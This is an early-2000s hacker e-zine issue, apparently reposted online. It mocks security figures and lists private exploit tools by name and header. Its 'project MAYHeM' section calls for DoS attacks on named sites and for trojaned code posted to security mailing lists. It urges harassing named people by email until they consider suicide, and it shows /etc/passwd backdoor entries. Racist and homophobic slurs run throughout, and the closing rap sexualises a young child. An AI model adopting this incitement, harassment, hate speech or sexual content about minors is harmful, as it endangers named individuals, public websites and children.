Copy Link
Add to Bookmark
Report

el8.2

eZine's profile picture
Published in 
el8
 · 26 Apr 2019

  

#!/bin/sh
################################################
## the gr8zt ez1ne t0 evr gr4ce this pl4ce. ##
################################################
##::::::::::::::::::::::::::::::::::::::::::::##
##:'####::::::'########:'##::::::::'#######:::##
##'## ##:'##: ##.....:: ##:::::::'##.... ##::##
##..::. ####:: ##::::::: ##::::::: ##:::: ##::##
##:::::....::: ######::: ##:::::::: #######:::##
##:::::::::::: ##...:::: ##:::::::'##.... ##::##
##:::::::::::: ##::::::: ##::::::: ##:::: ##::##
##:::~el8[2]:: ########: ########:. #######:::##
##::::::::::::........::........:::.......::::##
################################################
## the definitive src for the Afgan H/P Scene ##
################################################
## do "sh <ISSUE_NAME>" to extract eldump.c ##
## compile eldump.c and use it to extract ##
## the rest of the w4r3z: ##
## $ ./eldump el8.2.txt -vvv ##
## el8@press.co.jp ##
## <*> el8.n3.net ##
## <-> packetstorm.securify.com/mag/~el8/ ##
## <*> el8.8m.com ##
## <*> packetstormsecurity.com/mag/~el8/ ##
## <*> ftp.uu.net/tmp/EL8MAGAZINEDONTDELETE ##
## <-> keyword "~el8" on aol.com ##
## <-> www.textfiles.com/~el8 ##
## <-> nipc.gov/~el8 ##
## <-> www.fedworld.gov/0day/~el8 ##
## <-> www.fbi.gov/top10mostwanted/~el8 ##
################################################
## where have all the 0dayz g0neeeeeeeeeeeee! ##
################################################

cat <<'-+-+'> /dev/null
[BOI]
.----------------------------------------------------------------.
; t4ble of h0ly w4r3z & bey0nd ; ;
`------------------------------' ;
; *00* ~v~ intr0duktion ;
; *01* ~v~ food 4 th0t ;
; *02* ~v~ pr0jekt MAYHeM ;
; *03* ~v~ ADM 0day w4r3z 4 tr4de ;
; *04* ~v~ the rap thAt got 2pac c4pd by dk ;
; *05* ~v~ REAL solaris h4ckr LKM ;
; *06* ~v~ ~el8 ECHELON BASE ;
; *07* ~v~ SUM(n1gga th@ g0t rm'd) ;
; *08* ~v~ local cron exploit (dcron) ;
; *09* ~v~ bl4zt fr0m the p4st.bx ;
; *10* ~v~ private TESO press statement software (leaked) ;
; *11* ~v~ real cyber terrorist ;
; *12* ~v~ cisco coder cant code ;
; *13* ~v~ hacker comics ;
; *14* ~v~ anarchist kode kit ;
; *15* ~v~ opensshd local root exploit ;
; *16* ~v~ diztributed metag4ysis (distributed irc takeovers) ;
; *17* ~v~ r1pping 0ff ur locale telco ;
; *18* ~v~ fry sil foundation (FSF) ;
; *19* ~v~ hacker survey ;
; *20* ~v~ c0ntributi0nz ;
; *21* ~v~ HackPlayer (TM) ;
; *22* ~v~ ELDUMP & ELTAG ~el8 ez1ne t00lz ;
; *23* ~v~ clos1ngz werdz ;
`----------------------------------------------------------------'


.----------------------------------------------------------------.
; t4ble of ~el8 m3mbrZ ; ;
`----------------------' ;
; SiLLY G00S3 -> the h1gh preezt ;
; FuNNY BuNNY -> a BLiP on your gaydar ;
; ODaY MaZTeR -> getz all the HoEZ and CoDEz ;
; ENRiCO -> insane in the MeMBRAiN ;
; ReDPUBeZ -> aka KARRoT_BoTToM ;
; CaWCaW -> eye'll te4r YoUR EyEZ OuT ;
; KRaD -> so FReSH & so CLEaN ;
; CLiFF SToLE -> CLiFF SToLE YOUR NoTEZ ;
; PoonTar -> CRaZY CooL FRe$h ;
`----------------------------------------------------------------'



.~v~----------------------------------------------------------~v~.
; *00* intr0duktion -- ~el8 TEaM ;
`----------------------------------------------------------------'

w3lcome back friendz & fo'z a new issue of ~el8 h4z juzt
arrose. fr0m the b0tt0mless p1t it s4t, making itz way to
the skene lyke a van1lla ice kumb4k. held in s4nktum f0r
d4mn to long, the be4zt haz now been unleashed to rule lyke
k4hn. rule it h4z, and rule it w1ll, bekuZ the material in
th1z ezine iz 2 d4mn ill. the sc3ne iz a j0ke, we all know
th@, this ez1ne w1ll hit u h4rder than so1o and hiz dropstatd.

ok w3rd. a n3w ~el8 for u2 re4d. this 0ne iz *jam* p4kd lyke
a sl1mjim. re4d it all the w4y thru, phr0m top 2 bottom, *DO*
*NOT* *MISS* *ANYTHING* or it iz yor loss. also iph u h4ve not
re4d issu3z 0 & 1, re4d them now.

we r h4rdkore h4krz who clean your toilets, the h4rdkore k0derz
who forcefully w1pe y0ur wind0wz @ st0pl1ghtz and intersekti0nz,
the h4rdk0re phre4krZ who mow your l4wn, the h4rdk0re cr4krz
who ste4l cl0thez from the salvati0n army, we take yor orderz
at burger k1ng, we steal yor hubk4pz, we even put k4meraz in
port `o pottiez. *_DO_* *_NOT_* *_FUCK_* *_WITH_* *_US_*.

-- ~el8 team




.~v~----------------------------------------------------------~v~.
; *01* ~v~ food 4 th0t -- ~el8 TeaM ;
`----------------------------------------------------------------'

[kdu0dz] -> BoW10, all thoz du0dz who
[*]-> pozt f4ke shit {NAI DoS, GOBBLES, THoZe ROGUeZ SPooFerz}
-> pe0ple who m4ke f4ke exploitz and tr4de them, SGT KoDE,
-> VOiCE male DAiL, TCP JP, PAD2PAD MY Siztrz Blody Maxip4d,
-> MeaTLoaF Myke, CentreX DeX, MERiDiAN MaTT, pe0ple who
-> le4ve used kondumz on the ground 4me 2 uze kuz im 2
-> emb4r4ssed t0 purchase them myself.

[note-to-reader] -> read the whole fucking thing

[ldu0dz] -> every1 except [kdu0dz]
[*]-> including the n3w phr4ck te4m, HERt, ircs, fluffi
-> the fagg0t bunni, every1 in the [lamezt...] section.

....................................................................
~el8 jih4d - the h0ly w4r3z w4r - ~el8 jih4d - the h0ly w4r3z w4r -:
...................................................................'
[m1ssi0nz] -> br1ng an end to the security
[*]-> community, bring an end to open s0urce (m0re 0d4yz t0 n4b),
-> br1ng an end to kevin poulson & mitnik'z writing kareerz,
-> br1ng an end to the irc scene, br1ng an end to the ek0mmerce
-> c0mmunity, telev1se the p0rn aw4rdz on publ1k tv, st4rt
-> worldw1de internet kha0z, br1ng an end to media lmrz who
-> cl4im t0 be ELiTE bl4kh@z (ie, k2), again --------------
-> ------------c4use-w0rld-w1de-internet-kha0z-------------

[r1d-of-th1z-l4mer] -> Mark Dowd @ ISS (irc hakr on efnet)
...................................................................,
~el8 jih4d - the h0ly w4r3z w4r - ~el8 jih4d - the h0ly w4r3z w4r -:
....................................................................

[b-sure-2-chek-out] -> gaius's jakartasex.txt in contrib

[also-b-sure-2-chek-out] -> TRON ROLLING, the HackPlayer film
[*]-> HackPlayer (TM) is fucking elite..

[kku0lway2navigatethiz-ezineinvi] -> /\~v\~

[lamezt-mailing-list-ever] -> vuln-dev

[lamezt-lamer-of-the-ye4r] -> ratcorpse / ghettodxm
[*]-> www.sneakerz.org/~rat
-> PLaNeT uv th3 Apez p4rt 3 ^^
-> ParMaster iz n0 myke w4ldberg eye'll tell u th@ much, and
-> r4tc0rpse lu0x lyke an albino orang-o-t4ng

[lame-as-hell] -> TESO Press Announcement
[*]-> http://www.team-teso.net/sshd_statement.php <- lamuhz

[lamezt-sekurity-dork-oftheye4r] -> Toby Miller
[*]-> ch3k 0ut all 0f his lame shit on securityfocus.com
-> btw thiz iz by no me4nz advertisement of securityfocus.com
-> FUCK YOU SECURITYFOCUS.COM

[lamezt-channel-of-the-year] -> #darknet @ efnet
[*]-> aft3r 2 gl0riuz ye4rz 0f #hackphreak @ undernet h0ld1ng the
-> lamezt chann3l award, an even m0re l4me ch4nnel h4z sprung
-> itz ru0tz. h3r3 u w1ll find pe0ple tr4d1ng h0rdZ 0f f4ke
-> zer0d4yz and t4lk1ng ab0ut the m0st rekent def4cementz.
-> k33p it up guyz!! ur0q ur0q ur0q ur0q ur0q ur0q ur0q!!

[lamezt-koder-of-the-ye4r] -> vacuum
[*]-> wh4t a diskr4ze.. www.datanerds.net/~vacuum
-> chek 0ut m0re about our l4mer in the ~el8 l4mer sh0wk4se in:
-> ._________________________________________________.
-> !L!A!M!E!R! cisco coder cant code !S!H!O!W!C!A!S!E!
-> `-------------------------------------------------'
-> also, technotronic was shamefully defaced recently:
-> http://defaced.alldas.de/mirror/2001/12/07/www.technotronic.com/
-> apparently technotronic was running a vulnerable cgi
-> script that vacuum wrote to keep track of snort rule sets.

[lamezt-boyband-of-the-ye4r] -> bakdoor boyz

[lamezt-rapper-of-the-ye4r] -> Ja Rule (you fucking pussy)

[lamezt-chiqbitch-of-the-ye4r] -> brit4ny spe4rz
[*]-> wh1le ur l1p sinkn why d0nt u suk my 3.5 inch fl0ppy d1k

[lamezt-shittalkingfaggotretard] -> TRON

[bezt-support1ng-aktr] -> ge0rge c00ntrap

[worzt-nickname-to-pic] -> g0ddess (ratcorpse's homegrrl)
[*]-> irc du0dz eventually get ur jay peg, then ur to4st

[good-advice] -> alw4yz keep dkk auto g3t on,
[*]-> y0u nevr kn0w when someone w1ll confuse you w1th
[*]-> som1 else and s3nd u lo4dz 0f fre$h w4r3z..

[lamezt-ircnetwork-of-the-ye4r] -> ircsnet
[*]-> ircs.segfault.net, goto #segfault and FuCK with them all dhay

[lamezt-country-in-the-world] -> france (frogZ)

[lamezt-code-of-the-ye4r] -> jobe's solaris lkm
[*]-> u k4n find the aktual s0urce k0de t0 this lkm in:
-> .______________________________________________.
-> !L!A!M!E!S!T! REAL solaris h4ckr LKM !C!O!D!E!R!
-> `----------------------------------------------'

[biggezt-one-hit-wonder] -> no not vanilla ice, fyodor (nmap)

[only-midget-at-hacker-cons] -> route
[*]-> dont fuck with him tho, he w1ll chew y0ur nutz off

[dumb-lamerz-listed-inthisezine] -> www.adcops.com
[*]-> Dan Clements, Mike Brown, eye g0t ur cc# k0dez..

[coolest-irc-network-game] -> russian roulette

[lamezt-site-of-the-ye4r] -> yet again, slashdot

[2nd-lamezt-site-of-the-ye4r] -> hhp-programming.com

[3rd-lamezt-site-of-the-ye4r] -> cgisecurity.com

[lamezt-article-of-lame-phrack57] -> http://www.phrack.org/show.php?p=57&a=10
[*]-> lcamtuf's rise of the robots, more like rise of the moron

[best-narq-award] -> cripto@subterrain.net

[official-porn-site] -> www.al4a.com/links

We would like to sincerely thank all of you (0) idiots who voted.




.~v~----------------------------------------------------------~v~.
; *02* pr0jekt MAYHeM -- "~el8 team" ;
`----------------------------------------------------------------'

wh4t iz pr0jekt MAYHeM? pr0jekt MAYHeM iz ~el8'z plan to br1ng
down the intern3t. s1mply PuT we w4nt t0 *FUCK* up every ph0rum.
w3 w4nt t0 make the livez of people in certain ch4nnelz, a l1ving
*HELL*, simply PuT, we w4nt 2 destr0y IRC. w3 w4nt t0 demoralize
websitez lyke hack.co.za, securityfocus.com, or yahoo.com. w3
want the f3dZ to burn in *HELL*. w3 w4nt ug3n3 sp4ff0rd t0 die
of a sudden k4ze of influenza. w3 want the sekurity scene to burn
up in a bl4zing inphern0.

pr0jekt MAYHeM, kauze MAYHeM on the intern3t. eye h4ve dedikated
a f3w tasks to my br0therZ. p4rticipation iz greatly ne4ded. th1z
kan & will work. *WE* *NEED* *YOU!*.

iph u r n0w ask1ng urs3lf... "yo self, why the fuck do i want to
FuCK up the internet?"
, then u r not yet ment4ly re4dy f0r thiz
enourmouz oper4tion. g3t motivated. 0ne dhay, u w1ll all h8 the
internet az much az the ~el8 te4m.

here iz the ~el8 wishlist, of kourze, u can m4ke ur own wishl1st,
the main go4l here iz to *FUCK UP THE INTERNET*.


ph0rumZ:

MaNY ph0rumZ need to be demoralized and destr0yed. the ph0rumZ
we *m0stly* w4nt to destroy are:

SECURITYFOCUS [BUGTRAQ] <- fuck1ng lame
SECURITYFOCUS [VULNDEV] <- fuck1ng ret4rdZ
SECURITYFOCUS [INCIDENTS] <- fuck1ng dumb n4rq lamer faggotz
SECURITYFOCUS [JOBS] <- r u k1dd1ng m3? LAME

0k.. s1nce ~el8 iz very sk1lled @ demoralizing / caus1ng k4oz /
br1nging the rukuz, eye w1ll show you how to fuck with th3z l4me
ph0rumZ:

SECURITYFOCUS [BUGTRAQ] : 0k.. th1z is pr0bably the m0zt regulated
uv the ph0rumZ. h3r3 we k4n try 2 sl1p
t0nz of f4ke expl0itz / advis0rieZ / etc
pass3d 0ur friend aleph1 (FAGGOT).

th1z h4z been accomplished in the past.
wh3n certain advis0riez r releas3d, we k4n
subm1t tr0j4n k0dez / br0ken k0dez to
bugtr4q. usually h3 l3tz th3z g0 0n k0z u
kn0w al, he ne4dz the 0d4yz f1rZt 0n h1z
dum list. 0ne ex4mple 0f th1z is the n4m3d
tr0j4n releazed after horiz0n the f4g pstd.

SECURITYFOCUS [VULNDEV] : 0k.. th1z 0ne izn't as h4rd t0 phuck w1th.
th1z is v3ry simil4r t0 BUGTRAQ, we kan
s3nd t0nz 0f troj4nz / l4me brok3n k0dez,
and ask t0nz 0f stup1d fuck1ng qu3sti0nz
wh1ch w1ll c0ncentr8 the m4j0rity 0f the
list 0n b0guz trojan / broken k0dez.

SECURITYFOCUS [INCIDENTS]:0k, this one iz actually qu1te ku0l t0 phuq
w1th. u k4n p0st t0nz 0f f4ke h4k attempt
l0gz 0f y0ur h4kr foez onto this list,
which w1ll hopefully kauze many h4kkr w4rz
to occur in the incidentz ml. pr3tty ku0l
y3t sh0rt example:

Dear sirs;

I have been attacked recently. The attacker has penetrated all
of my machines. The attack signature left by the attacker, as I
have come to conclude is:

RLOXLEY::0:0:EHAP:/:/bin/sh <- In the middle of /etc/passwd
EHAPADMIN::0:0:Charlie Roto:/:/bin/sh <- At the end /etc/passwd

0k, that k1nd of shyt re4lly fuck1ng r0x.
the ph3dZ m1ght st0p re4d1ng thiz ml to
and st0p bust1ng all uz h4krz. ok w3rd
th1s list must b destr0yed.. and...
*DEMORALIZED*

SECURITYFOCUS [JOBS] : 0k, th1z wun iz quite funny 2 fuck w1th.
we k4n d0 al0t 0f phun shyt h3r3. we k4n
inqu1re t0nz ab0ut j0bz, we k4n p0st f4ke
j0b recruitm3ntz.. yadayada. ch3q 0ut th1s
phat ex4mple:

Howdy all, this is vonbonbon systems yall. We have some job openings
in the janitorial security research & development sector of our
company. Please contact someoneyouhate@theiremail.com.

0k az u kan see, we kan re4lly phuck up
this ph0rum. dem0ralize the phuck out of
it, K1LL SECURITYFOCUS.


emaleZ:

the purp0ze 0f this is to k1ll the morale of the email recipiant, &
h0pyfully they w1ll w4nt2 commit suicide, thuz, our mission will b
accomplished. h3re iz our wishlist:

Theo De Raadt : deraadt@openbsd.org
Eugene Spafford : spaf@cs.purdue.edu
Steve Case : stevecase@aol.com
Aleph1 : aleph1@securityfocus.com aleph1@underground.org
RLoxley : RLoxley@hackphreak.org
so1o : chris@chris2k.com
sektorgrl : sekti@undernet
sektorgrl'z MoM : jojobean@undernet
Chris Evans : eye 4got ur email but wh3n i g3t it ur dEwMd
horizon : horizon@monkey.org
k2 : k2@ktwo.ca
President : president@whitehouse.gov <- USA SuCKZ, HAiL CuBA


IRC ch4nnelZ:

ru1n thez channels. they suck ass. also ru1n thez irc networkz, they
contribute to the l4me:

#phrack @ efnet / @ unet
#hackphreak @ unet
#9x @ efnet
#2600 @ efnet
#!/bin/zsh @ efnet
#unix @ efnet / key is nohelp <- ahahaha
#lactose @ unet
#darknet @ efnet
#hack @ efnet / @ unet
#bearcave @ efnet
#!!adm @ efnet
#linuxsex @ unet
#phreak @ efnet
#solaris @ efnet
#hottub @ efnet
#teenchat @ efnet / @ unet <- losers
#exploit @ efnet / @ unet
#bifemunix @ efnet <- hot slut stripr hoe ab0de
#feed-the-goats @ efnet
#!synnergy @ efnet
#innuendo @ unet
#!@!low-level @ efnet

all of IRCNET irc.
all of DUGNET irc.
all of EFNET irc.
all of UNET irc.
keep it REaL DaLNeT.


webs1teZ:

well, ph0r the webs1tez.. i guess u k4n just w1p 0ut your DDoS net
and DoS the fuk out 0f them. eye h4vn't uzed any 0f thez t0yz but..
ph0r u, eye w1ll. anywho thiz is 0ur w1shl1st:

securityfocus.com
aol.com
hack.co.za <- up 4 sale, turn it into a gov-boi h8 site
2600.com
yahoo.com
ebay.com <- they auction underaged porno
cyberarmy.com
freelsd.net <- lamers
cdc.gov <- cult dead cow government hq
fbi.gov <- fluffi bunni institute
nsa.gov <- nerdy stupid assholes defacement group
fedworld.gov <- irc narq base hq
every security site
every exploit site
every lamer group site
every ecommerce site
every mcdonalds
*security*.{com,org,net,gov,nu}
*{security,sploit,exploit,hack}*.{com,org,net,gov,nu}
dont hurt the porno sites
dont hurt the porno sites


we k0me 2 t4ke b4ck wh4t iz r1ghtfully 0urz, --- CYBERSPACE ---.
and eye'll b d4mned iph we k0ntinue t0 let the c0rper4ti0nz c0ntr0l
*OUR* *WORLD*. G3T 0FF UR A$$, AND KAUZE S0ME MAAAAAAAAYH3M.

pr0j3kt MAYHeM -- ~el8 team




.~v~----------------------------------------------------------~v~.
; *03* ADM 0day w4r3z 4 tr4de -- "gov-boi" ;
`----------------------------------------------------------------'

Hello friends, this is gov-boi. I run a 0day trading repository
at www.hack.co.za. I am proud to say that hack.co.za has soared
to new heights. In this article, I will be exploring the hoards
of ADM 0day warez that we have acquired through various trading.

People in the underground who contribute bunchies to our archive:
* k2 (www.ktwo.ca)
* scut (www.avariationofTESOwillwork.org)
* so1o (www.chris2k.com)
* pr0ix (www.hack.co.za)
* RLoxley (RLoxley@hackphreak.org)
* cripto (jbl@subterrain.net)
* sunwutzu (candy@r00tworld.org)

In this document, I will take you, the reader, through a tour of
0days fancies. So enjoy, and remember, gov-boi-has-your-zerodays.

Index:
-----'
[0] ADMbgp
[1] ADMx25
[2] ADMtwix
[3] Dvorak-SSHD
[4] 7350854.c


-----------------------------------
:ADMbgp - Contributed by sunwutzu.:
-----------------------------------
za# ls
ADMbgp.c ADMbgp_dec.c ADMbgp_dec.o RCS/ admbgp* contrib/ dump/
ADMbgp.h ADMbgp_dec.h Makefile README bin/ docs/

za# wc -l *
958 ADMbgp.c
99 ADMbgp.h
256 ADMbgp_dec.c
12 ADMbgp_dec.h
19 ADMbgp_dec.o
44 Makefile
56 README
2853 admbgp
4297 total

za# ls bin docs dump contrib
bin:
admbgp*
contrib:
bgp.hosts.scanned.by.sunwutzu.txt
docs:
HOWTO analyse-update-bgp.txt rfc1771.txt.gz
dump:
bgp-decode.raw trace.bgp4-02

za# head -n ADMODAYISREALLYCOOLLOOKING ADMbgp.c
/*
*
* ADMbgp
*
*** ADM PRIVATE . PLEASE DO NOT DISTRIBUTE THIS CODE . ADM PRIVATE ***
*
* dav - candypimp - antilove
*
* 20010127 - candypimp join the project, and add support to decode
* BGP NOTIFICATION messages
*
* Compile: cc -o ADMbgp ADMbgp.c
*
* Use: n/a
*
* ---[ WARNING ]---
*
* DON'T USE THIS SOFTWARE WITHOUT READING THE README FILE IN THE
* CURRENT DIRECTORY. YOU MUST KNOW WHAT YOU ARE DOING BEFORE
* STARTING A BGP SESSION TO REMOTE HOST.
*
* ---[ EOF ]---
*
*
*
* $Id: ADMbgp.c,v 1.13 2001/01/29 15:15:02 dav Exp dav $

za# echo "straight from the fucking ADMcvs/"
straight from the fucking ADMcvs/

za# head -n CANDYPIMPISSUCHAFUCKINGSTUPIDHANDLEYOUIDIOT ADMbgp_dec.c
/*
*
* ADMbgp_dec.c
*
*** ADM PRIVATE . PLEASE DO NOT DISTRIBUTE THIS CODE . ADM PRIVATE ***
*
* candypimp (sunwutzu)
*
* ---[ WARNING ]---
*
* DON'T USE THIS SOFTWARE WITHOUT READING THE README FILE IN THE
* CURRENT DIRECTORY. YOU MUST KNOW WHAT YOU ARE DOING BEFORE
* STARTING A BGP SESSION TO REMOTE HOST.
*
* ---[ EOF ]---
*
*
* $Id: ADMbgp_dec.c,v 1.2 2001/01/29 15:15:20 dav Exp $
*
*/


za# head -n THEMAKEFILEMAKESEVERYONEAFRAIDOFADM Makefile
#
# $Id: Makefile,v 1.1 2001/01/24 23:27:54 dav Exp dav $
#
CFLAGS=-O9 -g -Wall
ADMbgp: ADMbgp.c ADMbgp.h ADMbgp_dec.o
cc -o ADMbgp ADMbgp.c ADMbgp_dec.o $(CFLAGS)
@echo
@echo
@echo " Please read README file * BEFORE * using this tool.";
@echo " You must to know what you are going and what are causes";
@echo
@echo " Use 'make diff' to create a staticly linked package";
@echo
@echo " and now... h@cK th3 W0r|D !!! ";
@echo

za# echo "ADMbgp costs 5 0days"
ADMbgp costs 5 0days


-----------------------------------
:ADMx25 - Contributed by sunwutzu.:
-----------------------------------

za# ls
CLEAN-DEFAULT-BIG-PASSWORD README parse.c slangmodem.c
LOG.FILE SAV.NUA parsef.c slangnet.c
NEWS admx25.doc script/ unix-vms-other-default
NUAGEN.c misc.c slang.c

za# wc -l *
595 CLEAN-DEFAULT-BIG-PASSWORD
2718 LOG.FILE
19 NEWS
24 NUAGEN.c
83 README
0 SAV.NUA
567 admx25.doc
78 misc.c
495 parse.c
280 parsef.c
416 slang.c
109 slangmodem.c
308 slangnet.c
267 unix-vms-other-default
5959 total

za# ls script/
CLEAN-DEFAULT-BIG-PASSWORD cisco-spr sprintnet-dialout.1
MHTdialupfinder dialrage sprintnet.dialup
NUA-WAREZ/ dialup-secour tnetbrute
NUA.SAV login x25-brute-sita
NUAGEN.c loginpass* x25-brute-sita-cisco
brute mikascript x25-script-xdm
brute-nui pass x25-script2
brute-sprint password x25-script3
brute-tymnet sita-new x25-sita
brute2 split.c x25-sita.au
cisco-spoof sprintnet-dialout jobe.sh

za# head -n DONTEVERDISTROTHISIFWETRADEIT README
# when u use script with Save option dont forget to create
# NUA.SAV filez ( echo > NUA.SAV ) for a virgin new scan
# and much important READ THE FUQN SCRIPT !
# if you dont understand what is it DONT USE IT MOTHERFUCKER !#@%$!@$!@
# i keep logz of anybody who get this distro
# if it's distro be sure to be blamed for this !

****** PRIVATA DONT DISTRO $@!$@! OR DIE !!!!!! (antilove)

here is all the *.c u need =)
for compile it's easy
** compile **
gcc parse.c -o script/admx25
** usage is simple admx25 <script>

** READ SCRIPT AND THE ADMx25 BEFORE ALL !!

the script/ contains some example of script's

x25-brute-sita:
simple brute forcer for SITA NUA ( use a Inet dialout)

x25-script2:
sprintnet NUA scanner ( use a inet dialout )

x25-script3:
scan sprintnet and get in memory the last nua u scan ( kewl if crash )

dialrage:
simple script of connection ( like a chat script )

tnetbrute:
telnet brute forcer
x25-sita: scan the SITA network from a fr's dialout

dialup-secour:
simple modme script

brute:
simple modem login hacker ( try ton's of l/p against a dialup)

brute2:
like brute but he can get the NUMBER to hack from a list

x25-sita.au:
like x25-sita but use a australien dialout

x25-brute-sita-cisco:
brute force a cisco simple "Password:" prompt (from a inet dialout)

x25-script-xdm:
scan sprintnet from a backdored machine with sundial

mikascript:
scan NUA from a sprintnet dialup

brute-sprintnet:
NUA login brute forcer via dialout tcp/ip

sprintnet.dialout.1:
new NUA scanner for sprinent via dialout tcp/ip

sprintnet.dialup:
NUA scanner for sprinnet dialup via a dialout from an router shivan(call by dialup) no trace :)~

brute.nui:
NUI brute forcer for sprint
tymnet-brute:
tymnet's MNEMONIC's scanner with log's file

cisco-spr:
cisco Password: forcer for sprint

cisco-spoof:
dialup spoofing script

sita-new:
sita NUA scanner ( use it ;)

MHTdialupfinder:
Wardial script from a Dialout

jobe.sh:
Autonet NUA scanner

Special thanks to gov-boi, ADM, w00w00, and RFP@!!@!@%!@)#$)!@!@#!

za# echo "thats elite shit, 10 0days"
thats elite shit, 10 0days


---------------
:ADMtwix - K2.:
---------------

za# ls
ADMtwix.h* TODO* register.shtml*
ADMtwix.tech* TODO_BUG* report*
Form_parse.c* alloc_cgi.c* test_the_Form.c*
Get_Form.c* beta.htm* twix-LOG*
Learn-NN.c* beta.htm.1* twix-LOG.sav*
Macro-File* contact_form.html* twix-LOG.sav.2*
Macro-File-Verbose* content_abon.htm* twix-NN.c*
Macro-File.1* id.rgx* twix-doc*
Macro_CGI.c* index.html* twixMacro.c*
Makefile* index.php* twixMacro.h*
listen.c* url2post* url2chars.c
login.html* url2post.c* aol.shadow
POST_TO_REGISTER* mailchange.htm* verifaction*
Page_error-parse.c* make_me_a_real_post.c* win98.rgx*
Post_NET.c* map.htm* winnt.rgx*
Print_CGI.c* misc.c* SEND_cgi.c
README* monportable*

za# echo "sorry i can't paste any readme stuff because it is in french"
sorry i can't paste any readme stuff because it is in french

za# echo "and all i know is african ape chest beating"
and all i know is african ape chest beating

za# ls -al
-rw-r----- 1 govboi 0day 21023911 Mar 9 01:22 ADM2000.tgz
-rw-r----- 1 govboi 0day 119511 Jan 2 22:09 ADMirc-0.1.5.tar.gz
-rw-r----- 1 govboi 0day 16506 Jan 2 22:04 ADMmutate.tar.gz
-rw-r----- 1 govboi 0day 4399 Jan 2 22:04 ADMoracle.tgz
-rw-r----- 1 govboi 0day 5619 Jan 2 22:09 ADMfdset.tgz
-rw-r----- 1 govboi 0day 29394 Jan 2 22:10 ADMttdb.tgz
-rw-r----- 1 govboi 0day 4011 Jan 2 23:15 ADMsynthol.c
-rw-r----- 1 govboi 0day 124327 Jan 2 23:15 ADMsshd.tgz
-rw-r----- 1 govboi 0day 9020 Jan 2 23:15 ADMtelnetdx.c
-rw-r----- 1 govboi 0day 12938128 Jan 2 23:15 ADM2001.tgz
-rw-r----- 1 scut 0day 5393228 Jan 2 23:15 T.tgz.pgp
-rw-r----- 1 govboi 0day 912391039 Jan 2 23:15 GAY.com.sunsnifflog

za# echo "Contact me, the ADM archives aren't for trade"
Contact me, the ADM archives aren't for trade


---------------------
:Dvorak-SSHD - so1o.:
---------------------

za# ls
7350brute.c Makefile communicate.h rsa.c ssh.h
7350brute.h README offsets/ rsa.h sshd-exploit.c
CREDITS TODO report.c rsaglue.c targets
CVS/ communicate.c report.h ssh-extern.h

za# cat CREDITS
Teso for bruteforcing h - buf code
gov-boi and f1ex for extensive real world testing
My brother Naja for inspiring me to become a hacker
lcamtuf for his incredible auditing ability

za# getusage sshd-exploit.c

void usage() {
dump("Usage: sshd-exploit -t# <options> host [port]\n");
dump("Options:\n");
dump("\t-t num (mandatory) defines target,use 0 for target list\n");
dump("\t-X string skips certain stages\n");
exit(EXIT_FAILURE);
}

za# this works on every sshd ever constructed, and on solaris, linux, and bsd
this works on every sshd ever constructed, and on solaris, linux, and bsd: Command not found

za# ls offsets/
README basic.sh find-free-hook.gdb find-offset.sh

za# echo "This oday costs 150 rupies"
This oday costs 150 rupies


-------------------------------
:7350854 - Contributed by zip.:
-------------------------------

head -n THISZERODAYISAMAZINGILOVEITWANTTOTRADE? 7350854.c
/* 7350854 - x86/bsd telnetd remote root exploit
*
* TESO CONFIDENTIAL - SOURCE MATERIALS
*
* This is unpublished proprietary source code of TESO Security.
*
* The contents of these coded instructions, statements and computer
* programs may not be disclosed to third parties, copied or duplicated in
* any form, in whole or in part, without the prior written permission of
* TESO Security. This includes especially the Bugtraq mailing list, the
* www.hack.co.za website and any public exploit archive.
*
* (C) COPYRIGHT TESO Security, 2001
* All Rights Reserved
*
*****************************************************************************
* bug found by scut 2001/06/09
* further research by smiler, zip, lorian, gov-boi, and me.
* thanks to zip's cool friend gov-boi for giving me a testbed to play on
*
* tested against: BSDI BSD/OS 4.1
* NetBSD 1.5
* FreeBSD 3.1
* FreeBSD 4.0-REL
* FreeBSD 4.2-REL
* FreeBSD 4.3-BETA
* FreeBSD 4.3-STABLE
* FreeBSD 4.3-RELEASE
*
*/


za# echo "TESO telnetd exploit, priceless."
TESO telnetd exploit, priceless.

Ok well there you have it, hack.co.za has almost every warez that
exists in the hacker community. Thanks to moles and sources in the
underground, we continue to strive and acheive the unacheivable.

Truly yours, gov-boi@hack.co.za




.~v~----------------------------------------------------------~v~.
; *04* the rap thAt got 2pac c4pd by dk -- dk@dhp.com ;
`----------------------------------------------------------------'

Tupac Was My Daddy

Verse 1

at the age of 4 i opened the drawer
i asked, "daddy whats this shiny gun for?"
he said, "son for killing punks and bustas"
my heart sunk and i asked "daddy am i a busta??"
he said, "no son you're a true G, daddy's little hustler"
then for the next couple of years it was all eyes on me
pac made sure i grew up right, taught me to read
tell time, unwind, and even how to kick the dope rhyme
i was pretty afrocentric.

Chrous
my daddy can beat up yours, doesnt make me do my chores, and even though
sometimes he gets crabby, u cant change the fact that tupac is my daddy.

Verse 2

then one day child services came for me..
"you're dads been locked up, selling drugs and he was drunk!"
NONONO dont take my daddy!
"sorry theres nothing we can do, well find a new family for you"
so thats how i wound up in cherry hill, new jersey
every night i prayed the courts would show my dad some mercy
but i went on, led a normal life, lived with a nice man
and his lovely wife, but when i was 18 i saw him
again, he was on tour with snoop and the deathrow clan
and it was as if i was trippin, i jumped out of my seat and said,
"good god i know that man!, hes my daddy!"

Chrous 2
my daddy rolls with dr dre, he'll do anything i say, and even
though im kinda flabby, u cant change the fact that tupac is my daddy.

Verse 3

i screamed and kicked and tried to climb up on the stage
but i was knocked out by a boucner full of rage
when i came to everyone was gone,
i didn't even get to hear him sing one last song....

(slower) then a few years later...struck down by an assasins bullet
i was so upset i got the keys to my new moms car and stole it
drove all the way to LA and stood by his side, he came to for a brief second
and said, "son, i have someting to confide"
i leaned close to hear what it was,
and he said "nice ride u jacked, it'd look better on dubs."

Chrous 3
tupac was my daddy, and he was the best damn dad there ever was,
and ill be his true G forever because, tupac was my daddy, he won a grammy,
i never knew my real mammy, but Tupac Amaru Shakur was and
will forever be the creator of me, my daddy.

Verse 4 (Rapped by tupacs daughter)

TIMTOWDI, love my daddy
tupacs lil hoe feds'll n ever nab me
i was born a thug nigga bitch
taught at age 3 ta never snitch
tupac gave birth to a ghetto princess
dont believe none o that shit 'bout incest
i gave my daddy tha love freely
i told that nigga to put the camera away when he peed on me
tupac was the momma i never had
taught me bout them maxi pads
daddy said 'damn them drawers stink'
i went ta change em, and they was pink!
i said damn daddy, my pussy bleedin
he said sugah, just hit this weed then
then he broke apart and a blunt
and slid them shits under my cunt
thug period once a month for life
covered in 2lbs of mite feces & mites

-END




